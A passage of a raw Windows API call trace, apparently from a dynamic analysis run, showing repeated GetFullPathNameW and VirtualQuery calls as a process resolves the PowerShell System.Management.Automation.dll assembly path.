lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.608] VirtualQuery (in: lpAddress=0x24b500, lpBuffer=0x24c3c0, dwLength=0x30 | out: lpBuffer=0x24c3c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.609] VirtualQuery (in: lpAddress=0x24b590, lpBuffer=0x24c450, dwLength=0x30 | out: lpBuffer=0x24c450*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.611] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.612] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.614] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.615] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.615] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.616] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.617] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.617] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.617] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.618] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.618] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.618] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.619] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.620] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.620] VirtualQuery (in: lpAddress=0x24b940, lpBuffer=0x24c800, dwLength=0x30 | out: lpBuffer=0x24c800*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.621] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.622] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.622] VirtualQuery (in: lpAddress=0x24bc70, lpBuffer=0x24cb30, dwLength=0x30 | out: lpBuffer=0x24cb30*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.623] VirtualQuery (in: lpAddress=0x24bd00, lpBuffer=0x24cbc0, dwLength=0x30 | out: lpBuffer=0x24cbc0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.623] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xbd0aa33e, Data2=0xdaf5, Data3=0x4ed7, Data4=([0]=0x83, [1]=0xc8, [2]=0x2b, [3]=0x47, [4]=0x6b, [5]=0xeb, [6]=0xb5, [7]=0xec))) returned 0x0 [0062.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.628] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.629] VirtualQuery (in: lpAddress=0x24bd10, lpBuffer=0x24cbd0, dwLength=0x30 | out: lpBuffer=0x24cbd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 